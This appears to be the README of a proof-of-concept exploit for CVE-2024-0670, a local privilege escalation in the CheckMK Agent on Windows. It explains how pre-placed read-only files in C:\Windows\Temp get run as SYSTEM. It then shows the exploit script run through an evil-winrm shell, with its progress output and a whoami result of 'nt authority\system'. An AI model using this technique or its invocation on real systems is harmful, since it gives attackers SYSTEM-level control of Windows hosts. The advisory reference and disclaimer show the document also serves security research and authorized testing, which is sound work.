CVE-2024-0670 PoC
This repository provides a Proof of Concept (PoC) exploit for the CVE-2024-0670 vulnerability, affecting the CheckMK Agent on Windows systems. The vulnerability occurs when the CheckMK Agent creates and executes temporary files in the C:\Windows\Temp directory. An attacker can abuse this behavior by pre-positioning malicious files in that directory with write protection. When the agent attempts to create a temporary file that already exists as read-only, it fails to overwrite it but still executes the existing file with SYSTEM privileges, enabling privilege escalation.
Advisory Reference: SEC Consult - Local Privilege Escalation via writable files in Checkmk Agent
This project is intended for educational, research, and authorized security testing purposes only.
Do not use this code on systems you do not own or have explicit permission to test.
The author is not responsible for any damage or misuse.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system